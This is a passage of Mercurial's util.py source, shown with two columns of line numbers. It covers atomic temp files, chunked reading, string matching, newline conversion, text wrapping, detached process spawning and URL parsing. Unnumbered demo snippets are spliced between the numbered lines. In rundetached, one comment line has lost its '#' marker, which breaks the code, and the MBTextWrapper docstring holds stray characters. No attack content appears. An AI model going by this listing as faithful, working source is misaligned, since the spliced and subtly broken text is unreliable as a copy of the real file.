2274 2315 '''writable file object that atomically updates a file
2275 2316
2276 2317 All writes will go to a temporary copy of the original file. Call
2277 2318 close() when you are done writing, and atomictempfile will rename
2278 2319 the temporary copy to the original name, making the changes
2279 2320 visible. If the object is destroyed without being closed, all your
2280 2321 writes are discarded.
2281 2322
2282 2323 The checkambig argument of the constructor is used with filestat,
2283 2324 and is useful only if the target file is guarded by a lock (e.g.
2284 2325 repo.lock or repo.wlock).
2285 2326 '''
2286 2327 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2287 2328 self.__name = name # permanent name
2288 2329 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2289 2330 createmode=createmode)
2290 2331 self._fp = posixfile(self._tempname, mode)
2291 2332 self._checkambig = checkambig
2292 2333
2293 2334 # delegated methods
2294 2335 self.read = self._fp.read
2295 2336 self.write = self._fp.write
2296 2337 self.seek = self._fp.seek
2297 2338 self.tell = self._fp.tell
2298 2339 self.fileno = self._fp.fileno
2299 2340
2300 2341 def close(self):
2301 2342 if not self._fp.closed:
2302 2343 self._fp.close()
2303 2344 filename = localpath(self.__name)
2304 2345 oldstat = self._checkambig and filestat.frompath(filename)
2305 2346 if oldstat and oldstat.stat:
2306 2347 rename(self._tempname, filename)
2307 2348 newstat = filestat.frompath(filename)
2308 2349 if newstat.isambig(oldstat):
2309 2350 # stat of changed file is ambiguous to original one
2310 2351 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2311 2352 os.utime(filename, (advanced, advanced))
2312 2353 else:
2313 2354 rename(self._tempname, filename)
2314 2355
2315 2356 def discard(self):
2316 2357 if not self._fp.closed:
2317 2358 try:
2318 2359 os.unlink(self._tempname)
2319 2360 except OSError:
2320 2361 pass
2321 2362 self._fp.close()
2322 2363
2323 2364 def __del__(self):
2324 2365 if safehasattr(self, '_fp'): # constructor actually did something
2325 2366 self.discard()
2326 2367
2327 2368 def __enter__(self):
2328 2369 return self
2329 2370
2330 2371 def __exit__(self, exctype, excvalue, traceback):
2331 2372 if exctype is not None:
2332 2373 self.discard()
2333 2374 else:
2334 2375 self.close()
2335 2376
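# A sketch of the context-manager usage enabled by __enter__/__exit__
# above (file name and payload hypothetical): on a clean exit the temp
# file is renamed over the target; on an exception it is discarded.
def _atomicwritedemo(path):
    with atomictempfile(path, 'wb', checkambig=True) as fp:
        fp.write(b'all or nothing\n')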
2336 2377 def unlinkpath(f, ignoremissing=False):
2337 2378 """unlink and remove the directory if it is empty"""
2338 2379 if ignoremissing:
2339 2380 tryunlink(f)
2340 2381 else:
2341 2382 unlink(f)
2342 2383 # try removing directories that might now be empty
2343 2384 try:
2344 2385 removedirs(os.path.dirname(f))
2345 2386 except OSError:
2346 2387 pass
2347 2388
2348 2389 def tryunlink(f):
2349 2390 """Attempt to remove a file, ignoring ENOENT errors."""
2350 2391 try:
2351 2392 unlink(f)
2352 2393 except OSError as e:
2353 2394 if e.errno != errno.ENOENT:
2354 2395 raise
2355 2396
2356 2397 def makedirs(name, mode=None, notindexed=False):
2357 2398 """recursive directory creation with parent mode inheritance
2358 2399
2359 2400 Newly created directories are marked as "not to be indexed by
2360 2401 the content indexing service", if ``notindexed`` is specified
2361 2402 for "write" mode access.
2362 2403 """
2363 2404 try:
2364 2405 makedir(name, notindexed)
2365 2406 except OSError as err:
2366 2407 if err.errno == errno.EEXIST:
2367 2408 return
2368 2409 if err.errno != errno.ENOENT or not name:
2369 2410 raise
2370 2411 parent = os.path.dirname(os.path.abspath(name))
2371 2412 if parent == name:
2372 2413 raise
2373 2414 makedirs(parent, mode, notindexed)
2374 2415 try:
2375 2416 makedir(name, notindexed)
2376 2417 except OSError as err:
2377 2418 # Catch EEXIST to handle races
2378 2419 if err.errno == errno.EEXIST:
2379 2420 return
2380 2421 raise
2381 2422 if mode is not None:
2382 2423 os.chmod(name, mode)
2383 2424
2384 2425 def readfile(path):
2385 2426 with open(path, 'rb') as fp:
2386 2427 return fp.read()
2387 2428
2388 2429 def writefile(path, text):
2389 2430 with open(path, 'wb') as fp:
2390 2431 fp.write(text)
2391 2432
2392 2433 def appendfile(path, text):
2393 2434 with open(path, 'ab') as fp:
2394 2435 fp.write(text)
2395 2436
2396 2437 class chunkbuffer(object):
2397 2438 """Allow arbitrary sized chunks of data to be efficiently read from an
2398 2439 iterator over chunks of arbitrary size."""
2399 2440
2400 2441 def __init__(self, in_iter):
2401 2442 """in_iter is the iterator that's iterating over the input chunks."""
2402 2443 def splitbig(chunks):
2403 2444 for chunk in chunks:
2404 2445 if len(chunk) > 2**20:
2405 2446 pos = 0
2406 2447 while pos < len(chunk):
2407 2448 end = pos + 2 ** 18
2408 2449 yield chunk[pos:end]
2409 2450 pos = end
2410 2451 else:
2411 2452 yield chunk
2412 2453 self.iter = splitbig(in_iter)
2413 2454 self._queue = collections.deque()
2414 2455 self._chunkoffset = 0
2415 2456
2416 2457 def read(self, l=None):
2417 2458 """Read L bytes of data from the iterator of chunks of data.
2418 2459 Returns less than L bytes if the iterator runs dry.
2419 2460
2420 2461 If size parameter is omitted, read everything"""
2421 2462 if l is None:
2422 2463 return ''.join(self.iter)
2423 2464
2424 2465 left = l
2425 2466 buf = []
2426 2467 queue = self._queue
2427 2468 while left > 0:
2428 2469 # refill the queue
2429 2470 if not queue:
2430 2471 target = 2**18
2431 2472 for chunk in self.iter:
2432 2473 queue.append(chunk)
2433 2474 target -= len(chunk)
2434 2475 if target <= 0:
2435 2476 break
2436 2477 if not queue:
2437 2478 break
2438 2479
2439 2480 # The easy way to do this would be to queue.popleft(), modify the
2440 2481 # chunk (if necessary), then queue.appendleft(). However, for cases
2441 2482 # where we read partial chunk content, this incurs 2 dequeue
2442 2483 # mutations and creates a new str for the remaining chunk in the
2443 2484 # queue. Our code below avoids this overhead.
2444 2485
2445 2486 chunk = queue[0]
2446 2487 chunkl = len(chunk)
2447 2488 offset = self._chunkoffset
2448 2489
2449 2490 # Use full chunk.
2450 2491 if offset == 0 and left >= chunkl:
2451 2492 left -= chunkl
2452 2493 queue.popleft()
2453 2494 buf.append(chunk)
2454 2495 # self._chunkoffset remains at 0.
2455 2496 continue
2456 2497
2457 2498 chunkremaining = chunkl - offset
2458 2499
2459 2500 # Use all of unconsumed part of chunk.
2460 2501 if left >= chunkremaining:
2461 2502 left -= chunkremaining
2462 2503 queue.popleft()
2463 2504 # offset == 0 is enabled by block above, so this won't merely
2464 2505 # copy via ``chunk[0:]``.
2465 2506 buf.append(chunk[offset:])
2466 2507 self._chunkoffset = 0
2467 2508
2468 2509 # Partial chunk needed.
2469 2510 else:
2470 2511 buf.append(chunk[offset:offset + left])
2471 2512 self._chunkoffset += left
2472 2513 left -= chunkremaining
2473 2514
2474 2515 return ''.join(buf)
2475 2516
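# A sketch of reading fixed-size records from arbitrarily-sized chunks
# (the chunk values are hypothetical): read(n) may span chunk boundaries,
# consuming partial chunks via the offset bookkeeping above.
def _chunkbufferdemo():
    cb = chunkbuffer(iter([b'ab', b'cdef', b'g']))
    first = cb.read(4)   # -> 'abcd', crossing the first chunk boundary
    rest = cb.read(3)    # -> 'efg', draining the remaining chunks
    return first, rest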
2476 2517 def filechunkiter(f, size=131072, limit=None):
2477 2518 """Create a generator that produces the data in the file size
2478 2519 (default 131072) bytes at a time, up to optional limit (default is
2479 2520 to read all data). Chunks may be less than size bytes if the
2480 2521 chunk is the last chunk in the file, or the file is a socket or
2481 2522 some other type of file that sometimes reads less data than is
2482 2523 requested."""
2483 2524 assert size >= 0
2484 2525 assert limit is None or limit >= 0
2485 2526 while True:
2486 2527 if limit is None:
2487 2528 nbytes = size
2488 2529 else:
2489 2530 nbytes = min(limit, size)
2490 2531 s = nbytes and f.read(nbytes)
2491 2532 if not s:
2492 2533 break
2493 2534 if limit:
2494 2535 limit -= len(s)
2495 2536 yield s
2496 2537
2497 2538 class cappedreader(object):
2498 2539 """A file object proxy that allows reading up to N bytes.
2499 2540
2500 2541 Given a source file object, instances of this type allow reading up to
2501 2542 N bytes from that source file object. Attempts to read past the allowed
2502 2543 limit are treated as EOF.
2503 2544
2504 2545 It is assumed that I/O is not performed on the original file object
2505 2546 in addition to I/O that is performed by this instance. If there is,
2506 2547 state tracking will get out of sync and unexpected results will ensue.
2507 2548 """
2508 2549 def __init__(self, fh, limit):
2509 2550 """Allow reading up to <limit> bytes from <fh>."""
2510 2551 self._fh = fh
2511 2552 self._left = limit
2512 2553
2513 2554 def read(self, n=-1):
2514 2555 if not self._left:
2515 2556 return b''
2516 2557
2517 2558 if n < 0:
2518 2559 n = self._left
2519 2560
2520 2561 data = self._fh.read(min(n, self._left))
2521 2562 self._left -= len(data)
2522 2563 assert self._left >= 0
2523 2564
2524 2565 return data
2525 2566
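# A sketch of bounding reads from a larger stream (values hypothetical):
# the proxy serves at most 'limit' bytes and then reports EOF, without
# consuming the rest of the underlying file object.
def _cappedreaderdemo():
    import io
    fh = io.BytesIO(b'0123456789')
    capped = cappedreader(fh, 4)
    head = capped.read()   # -> '0123'
    eof = capped.read(1)   # -> '' (past the limit is treated as EOF)
    return head, eof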
2526 2567 def stringmatcher(pattern, casesensitive=True):
2527 2568 """
2528 2569 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2529 2570 returns the matcher name, pattern, and matcher function.
2530 2571 missing or unknown prefixes are treated as literal matches.
2531 2572
2532 2573 helper for tests:
2533 2574 >>> def test(pattern, *tests):
2534 2575 ... kind, pattern, matcher = stringmatcher(pattern)
2535 2576 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2536 2577 >>> def itest(pattern, *tests):
2537 2578 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2538 2579 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2539 2580
2540 2581 exact matching (no prefix):
2541 2582 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2542 2583 ('literal', 'abcdefg', [False, False, True])
2543 2584
2544 2585 regex matching ('re:' prefix)
2545 2586 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2546 2587 ('re', 'a.+b', [False, False, True])
2547 2588
2548 2589 force exact matches ('literal:' prefix)
2549 2590 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2550 2591 ('literal', 're:foobar', [False, True])
2551 2592
2552 2593 unknown prefixes are ignored and treated as literals
2553 2594 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2554 2595 ('literal', 'foo:bar', [False, False, True])
2555 2596
2556 2597 case insensitive regex matches
2557 2598 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2558 2599 ('re', 'A.+b', [False, False, True])
2559 2600
2560 2601 case insensitive literal matches
2561 2602 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2562 2603 ('literal', 'ABCDEFG', [False, False, True])
2563 2604 """
2564 2605 if pattern.startswith('re:'):
2565 2606 pattern = pattern[3:]
2566 2607 try:
2567 2608 flags = 0
2568 2609 if not casesensitive:
2569 2610 flags = remod.I
2570 2611 regex = remod.compile(pattern, flags)
2571 2612 except remod.error as e:
2572 2613 raise error.ParseError(_('invalid regular expression: %s')
2573 2614 % e)
2574 2615 return 're', pattern, regex.search
2575 2616 elif pattern.startswith('literal:'):
2576 2617 pattern = pattern[8:]
2577 2618
2578 2619 match = pattern.__eq__
2579 2620
2580 2621 if not casesensitive:
2581 2622 ipat = encoding.lower(pattern)
2582 2623 match = lambda s: ipat == encoding.lower(s)
2583 2624 return 'literal', pattern, match
2584 2625
2585 2626 def shortuser(user):
2586 2627 """Return a short representation of a user name or email address."""
2587 2628 f = user.find('@')
2588 2629 if f >= 0:
2589 2630 user = user[:f]
2590 2631 f = user.find('<')
2591 2632 if f >= 0:
2592 2633 user = user[f + 1:]
2593 2634 f = user.find(' ')
2594 2635 if f >= 0:
2595 2636 user = user[:f]
2596 2637 f = user.find('.')
2597 2638 if f >= 0:
2598 2639 user = user[:f]
2599 2640 return user
2600 2641
2601 2642 def emailuser(user):
2602 2643 """Return the user portion of an email address."""
2603 2644 f = user.find('@')
2604 2645 if f >= 0:
2605 2646 user = user[:f]
2606 2647 f = user.find('<')
2607 2648 if f >= 0:
2608 2649 user = user[f + 1:]
2609 2650 return user
2610 2651
2611 2652 def email(author):
2612 2653 '''get email of author.'''
2613 2654 r = author.find('>')
2614 2655 if r == -1:
2615 2656 r = None
2616 2657 return author[author.find('<') + 1:r]
2617 2658
2618 2659 def ellipsis(text, maxlength=400):
2619 2660 """Trim string to at most maxlength (default: 400) columns in display."""
2620 2661 return encoding.trim(text, maxlength, ellipsis='...')
2621 2662
2622 2663 def unitcountfn(*unittable):
2623 2664 '''return a function that renders a readable count of some quantity'''
2624 2665
2625 2666 def go(count):
2626 2667 for multiplier, divisor, format in unittable:
2627 2668 if abs(count) >= divisor * multiplier:
2628 2669 return format % (count / float(divisor))
2629 2670 return unittable[-1][2] % count
2630 2671
2631 2672 return go
2632 2673
2633 2674 def processlinerange(fromline, toline):
2634 2675 """Check that linerange <fromline>:<toline> makes sense and return a
2635 2676 0-based range.
2636 2677
2637 2678 >>> processlinerange(10, 20)
2638 2679 (9, 20)
2639 2680 >>> processlinerange(2, 1)
2640 2681 Traceback (most recent call last):
2641 2682 ...
2642 2683 ParseError: line range must be positive
2643 2684 >>> processlinerange(0, 5)
2644 2685 Traceback (most recent call last):
2645 2686 ...
2646 2687 ParseError: fromline must be strictly positive
2647 2688 """
2648 2689 if toline - fromline < 0:
2649 2690 raise error.ParseError(_("line range must be positive"))
2650 2691 if fromline < 1:
2651 2692 raise error.ParseError(_("fromline must be strictly positive"))
2652 2693 return fromline - 1, toline
2653 2694
2654 2695 bytecount = unitcountfn(
2655 2696 (100, 1 << 30, _('%.0f GB')),
2656 2697 (10, 1 << 30, _('%.1f GB')),
2657 2698 (1, 1 << 30, _('%.2f GB')),
2658 2699 (100, 1 << 20, _('%.0f MB')),
2659 2700 (10, 1 << 20, _('%.1f MB')),
2660 2701 (1, 1 << 20, _('%.2f MB')),
2661 2702 (100, 1 << 10, _('%.0f KB')),
2662 2703 (10, 1 << 10, _('%.1f KB')),
2663 2704 (1, 1 << 10, _('%.2f KB')),
2664 2705 (1, 1, _('%.0f bytes')),
2665 2706 )
2666 2707
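# A sketch of building another unit renderer with unitcountfn(); the
# table entries here are hypothetical. Rows are tried top-down: the first
# (multiplier, divisor, format) row where abs(count) >= divisor *
# multiplier wins, and the last row is the fallback.
_timecount = unitcountfn(
    (1, 3600, _('%.1f hours')),
    (1, 60, _('%.1f minutes')),
    (1, 1, _('%.0f seconds')),
)
# _timecount(90) -> '1.5 minutes'; bytecount(2048) -> '2.00 KB'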
2667 2708 class transformingwriter(object):
2668 2709 """Writable file wrapper to transform data by function"""
2669 2710
2670 2711 def __init__(self, fp, encode):
2671 2712 self._fp = fp
2672 2713 self._encode = encode
2673 2714
2674 2715 def close(self):
2675 2716 self._fp.close()
2676 2717
2677 2718 def flush(self):
2678 2719 self._fp.flush()
2679 2720
2680 2721 def write(self, data):
2681 2722 return self._fp.write(self._encode(data))
2682 2723
2683 2724 # Matches a single EOL which can either be a CRLF where repeated CR
2684 2725 # are removed or a LF. We do not care about old Macintosh files, so a
2685 2726 # stray CR is an error.
2686 2727 _eolre = remod.compile(br'\r*\n')
2687 2728
2688 2729 def tolf(s):
2689 2730 return _eolre.sub('\n', s)
2690 2731
2691 2732 def tocrlf(s):
2692 2733 return _eolre.sub('\r\n', s)
2693 2734
2694 2735 def _crlfwriter(fp):
2695 2736 return transformingwriter(fp, tocrlf)
2696 2737
2697 2738 if pycompat.oslinesep == '\r\n':
2698 2739 tonativeeol = tocrlf
2699 2740 fromnativeeol = tolf
2700 2741 nativeeolwriter = _crlfwriter
2701 2742 else:
2702 2743 tonativeeol = pycompat.identity
2703 2744 fromnativeeol = pycompat.identity
2704 2745 nativeeolwriter = pycompat.identity
2705 2746
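# A sketch of the newline helpers above (fp is a hypothetical binary file
# object opened for writing): normalize input to LF, then let the
# platform-dependent writer re-encode it to the native convention.
def _eoldemo(fp):
    w = nativeeolwriter(fp)
    w.write(tolf(b'one\r\ntwo\n'))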
2706 2747 def escapestr(s):
2707 2748 # call underlying function of s.encode('string_escape') directly for
2708 2749 # Python 3 compatibility
2709 2750 return codecs.escape_encode(s)[0]
2710 2751
2711 2752 def unescapestr(s):
2712 2753 return codecs.escape_decode(s)[0]
2713 2754
2714 2755 def forcebytestr(obj):
2715 2756 """Portably format an arbitrary object (e.g. exception) into a byte
2716 2757 string."""
2717 2758 try:
2718 2759 return pycompat.bytestr(obj)
2719 2760 except UnicodeEncodeError:
2720 2761 # non-ascii string, may be lossy
2721 2762 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2722 2763
2723 2764 def uirepr(s):
2724 2765 # Avoid double backslash in Windows path repr()
2725 2766 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2726 2767
2727 2768 # delay import of textwrap
2728 2769 def MBTextWrapper(**kwargs):
2729 2770 class tw(textwrap.TextWrapper):
2730 2771 """
2731 2772 Extend TextWrapper for width-awareness.
2732 2773
2733 2774 Neither the number of 'bytes' in any encoding nor the number of
2734 2775 'characters' is appropriate for calculating terminal columns of a
2735 2776 given string.
2736 2777 
2737 2778 The original TextWrapper implementation uses the built-in 'len()'
2738 2779 directly, so overriding is needed to use the width of each character.
2739 2780 
2740 2781 In addition, characters of 'ambiguous' width are treated as wide
2741 2782 in East Asian locales but as narrow elsewhere; determining their
2742 2783 width therefore requires a decision from the user.
2743 2784 """
2744 2785 def _cutdown(self, ucstr, space_left):
2745 2786 l = 0
2746 2787 colwidth = encoding.ucolwidth
2747 2788 for i in xrange(len(ucstr)):
2748 2789 l += colwidth(ucstr[i])
2749 2790 if space_left < l:
2750 2791 return (ucstr[:i], ucstr[i:])
2751 2792 return ucstr, ''
2752 2793
2753 2794 # overriding of base class
2754 2795 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2755 2796 space_left = max(width - cur_len, 1)
2756 2797
2757 2798 if self.break_long_words:
2758 2799 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2759 2800 cur_line.append(cut)
2760 2801 reversed_chunks[-1] = res
2761 2802 elif not cur_line:
2762 2803 cur_line.append(reversed_chunks.pop())
2763 2804
2764 2805 # this overriding code is imported from TextWrapper of Python 2.6
2765 2806 # to calculate columns of string by 'encoding.ucolwidth()'
2766 2807 def _wrap_chunks(self, chunks):
2767 2808 colwidth = encoding.ucolwidth
2768 2809
2769 2810 lines = []
2770 2811 if self.width <= 0:
2771 2812 raise ValueError("invalid width %r (must be > 0)" % self.width)
2772 2813
2773 2814 # Arrange in reverse order so items can be efficiently popped
2774 2815 # from a stack of chunks.
2775 2816 chunks.reverse()
2776 2817
2777 2818 while chunks:
2778 2819
2779 2820 # Start the list of chunks that will make up the current line.
2780 2821 # cur_len is just the length of all the chunks in cur_line.
2781 2822 cur_line = []
2782 2823 cur_len = 0
2783 2824
2784 2825 # Figure out which static string will prefix this line.
2785 2826 if lines:
2786 2827 indent = self.subsequent_indent
2787 2828 else:
2788 2829 indent = self.initial_indent
2789 2830
2790 2831 # Maximum width for this line.
2791 2832 width = self.width - len(indent)
2792 2833
2793 2834 # First chunk on line is whitespace -- drop it, unless this
2794 2835 # is the very beginning of the text (i.e. no lines started yet).
2795 2836 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2796 2837 del chunks[-1]
2797 2838
2798 2839 while chunks:
2799 2840 l = colwidth(chunks[-1])
2800 2841
2801 2842 # Can at least squeeze this chunk onto the current line.
2802 2843 if cur_len + l <= width:
2803 2844 cur_line.append(chunks.pop())
2804 2845 cur_len += l
2805 2846
2806 2847 # Nope, this line is full.
2807 2848 else:
2808 2849 break
2809 2850
2810 2851 # The current line is full, and the next chunk is too big to
2811 2852 # fit on *any* line (not just this one).
2812 2853 if chunks and colwidth(chunks[-1]) > width:
2813 2854 self._handle_long_word(chunks, cur_line, cur_len, width)
2814 2855
2815 2856 # If the last chunk on this line is all whitespace, drop it.
2816 2857 if (self.drop_whitespace and
2817 2858 cur_line and cur_line[-1].strip() == r''):
2818 2859 del cur_line[-1]
2819 2860
2820 2861 # Convert current line back to a string and store it in list
2821 2862 # of all lines (return value).
2822 2863 if cur_line:
2823 2864 lines.append(indent + r''.join(cur_line))
2824 2865
2825 2866 return lines
2826 2867
2827 2868 global MBTextWrapper
2828 2869 MBTextWrapper = tw
2829 2870 return tw(**kwargs)
2830 2871
2831 2872 def wrap(line, width, initindent='', hangindent=''):
2832 2873 maxindent = max(len(hangindent), len(initindent))
2833 2874 if width <= maxindent:
2834 2875 # adjust for weird terminal size
2835 2876 width = max(78, maxindent + 1)
2836 2877 line = line.decode(pycompat.sysstr(encoding.encoding),
2837 2878 pycompat.sysstr(encoding.encodingmode))
2838 2879 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2839 2880 pycompat.sysstr(encoding.encodingmode))
2840 2881 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2841 2882 pycompat.sysstr(encoding.encodingmode))
2842 2883 wrapper = MBTextWrapper(width=width,
2843 2884 initial_indent=initindent,
2844 2885 subsequent_indent=hangindent)
2845 2886 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2846 2887
2847 2888 if (pyplatform.python_implementation() == 'CPython' and
2848 2889 sys.version_info < (3, 0)):
2849 2890 # There is an issue in CPython that some IO methods do not handle EINTR
2850 2891 # correctly. The following table shows what CPython version (and functions)
2851 2892 # are affected (buggy: has the EINTR bug, okay: otherwise):
2852 2893 #
2853 2894 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2854 2895 # --------------------------------------------------
2855 2896 # fp.__iter__ | buggy | buggy | okay
2856 2897 # fp.read* | buggy | okay [1] | okay
2857 2898 #
2858 2899 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2859 2900 #
2860 2901 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2861 2902 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2862 2903 #
2863 2904 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2864 2905 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2865 2906 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2866 2907 # fp.__iter__ but not other fp.read* methods.
2867 2908 #
2868 2909 # On modern systems like Linux, the "read" syscall cannot be interrupted
2869 2910 # when reading "fast" files like on-disk files. So the EINTR issue only
2870 2911 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2871 2912 # files approximately as "fast" files and use the fast (unsafe) code path,
2872 2913 # to minimize the performance impact.
2873 2914 if sys.version_info >= (2, 7, 4):
2874 2915 # fp.readline deals with EINTR correctly, use it as a workaround.
2875 2916 def _safeiterfile(fp):
2876 2917 return iter(fp.readline, '')
2877 2918 else:
2878 2919 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2879 2920 # note: this may block longer than necessary because of bufsize.
2880 2921 def _safeiterfile(fp, bufsize=4096):
2881 2922 fd = fp.fileno()
2882 2923 line = ''
2883 2924 while True:
2884 2925 try:
2885 2926 buf = os.read(fd, bufsize)
2886 2927 except OSError as ex:
2887 2928 # os.read only raises EINTR before any data is read
2888 2929 if ex.errno == errno.EINTR:
2889 2930 continue
2890 2931 else:
2891 2932 raise
2892 2933 line += buf
2893 2934 if '\n' in buf:
2894 2935 splitted = line.splitlines(True)
2895 2936 line = ''
2896 2937 for l in splitted:
2897 2938 if l[-1] == '\n':
2898 2939 yield l
2899 2940 else:
2900 2941 line = l
2901 2942 if not buf:
2902 2943 break
2903 2944 if line:
2904 2945 yield line
2905 2946
2906 2947 def iterfile(fp):
2907 2948 fastpath = True
2908 2949 if type(fp) is file:
2909 2950 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2910 2951 if fastpath:
2911 2952 return fp
2912 2953 else:
2913 2954 return _safeiterfile(fp)
2914 2955 else:
2915 2956 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2916 2957 def iterfile(fp):
2917 2958 return fp
2918 2959
2919 2960 def iterlines(iterator):
2920 2961 for chunk in iterator:
2921 2962 for line in chunk.splitlines():
2922 2963 yield line
2923 2964
2924 2965 def expandpath(path):
2925 2966 return os.path.expanduser(os.path.expandvars(path))
2926 2967
2927 2968 def hgcmd():
2928 2969 """Return the command used to execute current hg
2929 2970
2930 2971 This is different from hgexecutable() because on Windows we want
2931 2972 to avoid things opening new shell windows like batch files, so we
2932 2973 get either the python call or current executable.
2933 2974 """
2934 2975 if mainfrozen():
2935 2976 if getattr(sys, 'frozen', None) == 'macosx_app':
2936 2977 # Env variable set by py2app
2937 2978 return [encoding.environ['EXECUTABLEPATH']]
2938 2979 else:
2939 2980 return [pycompat.sysexecutable]
2940 2981 return gethgcmd()
2941 2982
2942 2983 def rundetached(args, condfn):
2943 2984 """Execute the argument list in a detached process.
2944 2985
2945 2986 condfn is a callable which is called repeatedly and should return
2946 2987 True once the child process is known to have started successfully.
2947 2988 At this point, the child process PID is returned. If the child
2948 2989 process fails to start or finishes before condfn() evaluates to
2949 2990 True, return -1.
2950 2991 """
2951 2992 # Windows case is easier because the child process is either
2952 2993 # successfully starting and validating the condition or exiting
2953 2994 # on failure. We just poll on its PID. On Unix, if the child
2954 2995 # process fails to start, it will be left in a zombie state until
2955 2996 the parent waits on it, which we cannot do since we expect a
2956 2997 long-running process on success. Instead we listen for SIGCHLD telling
2957 2998 # us our child process terminated.
2958 2999 terminated = set()
2959 3000 def handler(signum, frame):
2960 3001 terminated.add(os.wait())
2961 3002 prevhandler = None
2962 3003 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2963 3004 if SIGCHLD is not None:
2964 3005 prevhandler = signal.signal(SIGCHLD, handler)
2965 3006 try:
2966 3007 pid = spawndetached(args)
2967 3008 while not condfn():
2968 3009 if ((pid in terminated or not testpid(pid))
2969 3010 and not condfn()):
2970 3011 return -1
2971 3012 time.sleep(0.1)
2972 3013 return pid
2973 3014 finally:
2974 3015 if prevhandler is not None:
2975 3016 signal.signal(signal.SIGCHLD, prevhandler)
2976 3017
2977 3018 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2978 3019 """Return the result of interpolating items in the mapping into string s.
2979 3020
2980 3021 prefix is a single character string, or a two character string with
2981 3022 a backslash as the first character if the prefix needs to be escaped in
2982 3023 a regular expression.
2983 3024
2984 3025 fn is an optional function that will be applied to the replacement text
2985 3026 just before replacement.
2986 3027
2987 3028 escape_prefix is an optional flag that allows using doubled prefix for
2988 3029 its escaping.
2989 3030 """
2990 3031 fn = fn or (lambda s: s)
2991 3032 patterns = '|'.join(mapping.keys())
2992 3033 if escape_prefix:
2993 3034 patterns += '|' + prefix
2994 3035 if len(prefix) > 1:
2995 3036 prefix_char = prefix[1:]
2996 3037 else:
2997 3038 prefix_char = prefix
2998 3039 mapping[prefix_char] = prefix_char
2999 3040 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3000 3041 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3001 3042
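# A sketch of interpolate() with a regex-escaped prefix (mapping and
# input are hypothetical): '\$' is the two-character escaped form of the
# one-character prefix '$', and each '$key' occurrence is replaced from
# the mapping.
def _interpolatedemo():
    mapping = {b'user': b'alice', b'repo': b'hg'}
    return interpolate(br'\$', mapping, b'pushed to $repo by $user')
    # -> 'pushed to hg by alice'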
3002 3043 def getport(port):
3003 3044 """Return the port for a given network service.
3004 3045
3005 3046 If port is an integer, it's returned as is. If it's a string, it's
3006 3047 looked up using socket.getservbyname(). If there's no matching
3007 3048 service, error.Abort is raised.
3008 3049 """
3009 3050 try:
3010 3051 return int(port)
3011 3052 except ValueError:
3012 3053 pass
3013 3054
3014 3055 try:
3015 3056 return socket.getservbyname(pycompat.sysstr(port))
3016 3057 except socket.error:
3017 3058 raise Abort(_("no port number associated with service '%s'") % port)
3018 3059
3019 3060 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3020 3061 '0': False, 'no': False, 'false': False, 'off': False,
3021 3062 'never': False}
3022 3063
3023 3064 def parsebool(s):
3024 3065 """Parse s into a boolean.
3025 3066
3026 3067 If s is not a valid boolean, returns None.
3027 3068 """
3028 3069 return _booleans.get(s.lower(), None)
3029 3070
3030 3071 _hextochr = dict((a + b, chr(int(a + b, 16)))
3031 3072 for a in string.hexdigits for b in string.hexdigits)
3032 3073
3033 3074 class url(object):
3034 3075 r"""Reliable URL parser.
3035 3076
3036 3077 This parses URLs and provides attributes for the following
3037 3078 components:
3038 3079
3039 3080 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3040 3081
3041 3082 Missing components are set to None. The only exception is
3042 3083 fragment, which is set to '' if present but empty.
3043 3084
3044 3085 If parsefragment is False, fragment is included in query. If
3045 3086 parsequery is False, query is included in path. If both are
3046 3087 False, both fragment and query are included in path.
3047 3088
3048 3089 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3049 3090
3050 3091 Note that for backward compatibility reasons, bundle URLs do not
3051 3092 take host names. That means 'bundle://../' has a path of '../'.
3052 3093
3053 3094 Examples:
3054 3095
3055 3096 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3056 3097 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3057 3098 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3058 3099 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3059 3100 >>> url(b'file:///home/joe/repo')
3060 3101 <url scheme: 'file', path: '/home/joe/repo'>
3061 3102 >>> url(b'file:///c:/temp/foo/')
3062 3103 <url scheme: 'file', path: 'c:/temp/foo/'>
3063 3104 >>> url(b'bundle:foo')
